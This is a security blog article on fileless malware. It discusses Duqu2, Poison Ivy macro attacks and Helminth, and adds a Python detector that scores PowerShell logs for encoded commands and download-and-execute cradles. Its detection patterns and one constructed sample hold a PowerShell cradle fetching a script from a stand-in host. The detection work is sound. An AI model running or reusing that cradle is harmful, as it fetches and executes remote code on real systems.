Most of the time, when malware invades your network it leaves something behind: a set of files, an executable program that is disguised inside a Word document or a PDF, or something else. While it is great that the detection programs have gotten better at finding these pieces of evidence and stopping them from harming your infrastructure, the bad guys have also figured out ways around being detected.
What if malware could do its dirty work without leaving anything behind? That is where so-called “fileless” malware comes into play. In March Carbon Black released a study among security researchers that showed that close to two-thirds of them have seen an increase in non-malware attacks since the beginning of 2016. And indications are things are only going to get worse.
The fileless designation is somewhat misleading, since you still need something stored in memory on the target machine. Nevertheless, there are several different fileless approaches. One is simply to cover your tracks. This is what the fileless malware family called Duqu2 does. As posted on Securelist, it evades detection by removing the MSI package that was initially used to infect the endpoint. What is left is just running in memory, at least until the PC is rebooted.
Another idea is to gather small bits of code that are already written and memory-resident into a coherent attack. Because it repurposes code that is already in use, it is a lot more dangerous and very difficult to detect and to prevent. This is called return-oriented programming. The malware can execute standard DLLs and other executable sequences of code that can compromise an otherwise uninfected system. This means that apps themselves, even ones that have been carefully crafted, can be a threat.
This could take the form of using in-memory PowerShell commands, hiding inside Word macros, or leveraging the macro code to do damage to your systems. FireEye researchers recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Word document may have been infected with Poison Ivy, a popular remote access tool that has been used for nearly a decade for key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more. The attack used fileless execution to operate exclusively in memory and made use of decoy documents. It also tried to evade Windows’ AppLocker protections, again making it harder to detect.
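As an added example (not from the original article, and not code from Carbon Black, FireEye or Microsoft), here is a small Python triage script that scans PowerShell command lines and script-block text for the in-memory execution patterns just described: base64-encoded commands, download-and-execute cradles, and reflective assembly loading. The sample entries are constructed to look like Sysmon process-creation and PowerShell script block logging (event 4104) text rather than captured data, and the indicator names, weights and alert threshold are this example's own choices, not a published scoring scheme.

```python
import base64
import re
from typing import Optional

# Weighted indicators of in-memory PowerShell execution. Names, regexes and
# weights are this example's own choices (assumptions), not a vendor rule set.
INDICATORS = {
    "encoded_command": (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), 3),
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 3),
    "invoke_expression": (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
    "reflective_load": (re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "no_profile": (re.compile(r"-nop\b|-noprofile\b", re.I), 1),
}
ALERT_THRESHOLD = 3  # assumed starting point; tune against your own baseline

ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(script: str) -> Optional[str]:
    """Return the payload hidden behind a -EncodedCommand argument, or None.
    PowerShell expects base64 of the UTF-16LE script text."""
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script(script: str) -> dict:
    """Score one command line / script block against the indicator table."""
    decoded = decode_encoded_command(script)
    # Scan the raw text and, when present, the decoded payload: the telling
    # indicators (cradle, IEX) are usually hidden inside the encoding.
    texts = [script] + ([decoded] if decoded else [])
    hits = {name for name, (pattern, _) in INDICATORS.items()
            if any(pattern.search(t) for t in texts)}
    score = sum(INDICATORS[name][1] for name in hits)
    return {"indicators": sorted(hits), "score": score, "decoded": decoded}


def triage(events) -> list:
    """Return the events whose score reaches the alert threshold."""
    findings = []
    for ev in events:
        result = analyze_script(ev["script"])
        if result["score"] >= ALERT_THRESHOLD:
            findings.append({"id": ev["id"], "host": ev["host"], **result})
    return findings


def encode_command(cmd: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it,
    so the constructed sample below is a faithful encoding."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample entries (not real captured logs); hostnames are made up.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-01",
     "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"id": 2, "host": "WS-02",
     "script": "powershell.exe -NoP -W Hidden -Enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")},
    {"id": 3, "host": "WS-03",
     "script": "[System.Reflection.Assembly]::Load($bytes) | Out-Null"},
    {"id": 4, "host": "WS-04",
     "script": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"event {finding['id']} on {finding['host']}: score {finding['score']} "
              f"indicators={finding['indicators']}")
        if finding["decoded"]:
            print("  decoded payload:", finding["decoded"])
```

None of this needs a file on disk to exist: the signal comes from what PowerShell was asked to run, which is why script block logging and process command-line auditing are worth turning on before a fileless incident rather than after. Expect to tune the weights and threshold against your own administrators' habits; an encoded command by itself is common in legitimate automation, which is why the example also decodes it and scores what is inside.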
Another example of these types of attacks was found by security researchers investigating an attack earlier this year in Israel. The malware installed a fileless variant of the Helminth Trojan agent. While Microsoft released the patch for this vulnerability in April, the attackers based their attack on a proof-of-concept method that researchers published after the patch was released.
So what are IT managers to do to try to fight fileless attacks? First, use DLP products such as those available from iboss, since often a typical action once malware is detonated is to steal data and move it outside the corporate network. The quicker you know sensitive data is leaving your network, the quicker you can respond to the attack.
Second, patch quickly. Some of these exploits were designed to take place soon after vulnerabilities were discovered but before patches were put into general circulation. Look for embedded systems that are running ancient OSs or applications that require use of outdated browser versions.
Finally, review your network isolation policies and setup. Make use of VLANs and internal firewalls to block network traffic that originates internally, because it could be a threat.
David Strom is one of the leading experts on network and Internet technologies and has written and spoken extensively on topics such as VOIP, convergence, email, cloud computing, network management, Internet applications, wireless and Web services for more than 25 years. He has had several editorial management positions for both print and online properties and currently writes for Dice, Techtarget's SearchSecurity.com, ITworld.com and Network World. Find him on Twitter @dstrom and on his website strominator.com.